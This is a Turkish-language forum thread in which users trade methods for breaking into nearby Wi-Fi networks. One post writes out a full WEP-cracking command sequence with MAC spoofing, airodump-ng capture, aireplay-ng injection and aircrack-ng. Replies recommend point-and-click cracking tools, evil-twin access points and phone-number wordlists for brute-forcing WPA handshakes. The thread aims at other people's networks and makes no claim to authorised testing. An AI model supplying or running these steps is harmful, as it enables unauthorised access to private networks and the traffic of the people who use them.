Word List Olmadan Wpa Kırmak?
-
hacılar geçenlerde backtrack ile uyumlu bi wifi adaptörü aldım. wep kırması çok kolay oluyo. fakat etrafta tek tük wep var. bkz artık herkes wpa kullanıyo. word liste gerek olmadan wpayı nasıl kırarım? 2-3 gün paket toplasın önemli değil. ama hangi kodlarla backtrack ile wpa kırabilirim?
wep i şöyle kırıyorum ama wpa ya deneyince hata felan gösteriyo:
____
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airodump-ng -c (kanal) -w asd --bssid (ağ mac adresi) wlan0
____
aireplay-ng -1 0 -a (ağ mac adresi) -h 00:11:22:33:44:55 wlan0
aireplay-ng -2 0841 -c ff:ff:ff:ff:ff:ff -b (ağ mac adresi) -h 00:11:22:33:44:55 wlan0
____
aircrack-ng -b (ağ mac adresi) asd-01.cap -
ubuntu ve ya backtrack kullanıyorsan gerix-wifi-cracker yükle aynı işi yapsada görsel olduğundan rahat edersin uğraşmazsın komutla vs.
bildiğim wpa için handshake yakalayıp wordlist ile kırmak şart.
-
K4R4B4S4N bunu yazdı:
-----------------------------
ubuntu ve ya backtrack kullanıyorsan gerix-wifi-cracker yükle aynı işi yapsada görsel olduğundan rahat edersin uğraşmazsın komutla vs.
hacı usb ye yükledim bt3 onla giriyorum. linuxtan da hiç bişe anlamam. program yüklemesini felan. bi de yeteri kadar paket toplayınca yine kırılır diye düşünüyorum word list olmadan? -
wordlist olmadan yada dogrusu bruteforce olmadan wpa kıramazsın.
bir ara duymustum. wordlist kullanmadan GPU kullanarak runtime bruteforce yapan bir yazılım ama adı neydı felan hatırlamıyorum
-
K4R4B4S4N bunu yazdı:
-----------------------------wifi dem i geçerli gerix
yoksa wireless da da geçerli mi
-
bana türklerin kullandıkları şifrelerin wordlisti lazım :S
-
Hacılar bulursanız süper olu r:D:D
Bt4 te grimwepa war çok güzel bir program. Ayrıca görsel kodalrla uğraştırmaz..
Wpa olayına gelince wordlist çok uzun iş be hocam. face ap devil ap diye bir olay var oda düşük ihtimal adamın otomatik bağlandığını varsayarsak. ... uzun hikaye yani ..
İnternette dolaşan bi rivayetvar rivayetin gerçek olup olmadığını daha bulamadım adamlar 15 dk da wpa kırıyor bruteforce olmadan. ..
Bilisi olan varsa aylaşsın..
Bu arada ot wirless adaptör alacak arkadaşlar atheros çipsetli olmasına dikkat etsin yoksa back track görmüyor ..
Ayrıca wirless adaptörü monitör moda almak için airmon-ng yi çalıştırın size orada sorar monitor moda olarak hangi intrface seçeyim diye seçersiniz. airmonda görüyorsa adaptörünüzü sıkıtı yoktur görmüyorsa uğraştırır işte sizi.
Computerwolf bi ara epey uğraıyordu. Computer abi bi döküman yazda gözümüz gönlümüz şenlensin.. :D
-
wpa şifresini kırmak için wordlist gerekir kendiniz wordlist hazırlarsınız telefon numarası 6 7 8 9 haneli sayılar cep telefon numaraları vs. bunları denemek basit, olursa olur olmazsa uğraşmaya değmez.Wpa şifresini wordlist ile kırmak için handshake yakalamanız gerekir topladığın paketin bir önemi yok .
-
takip ...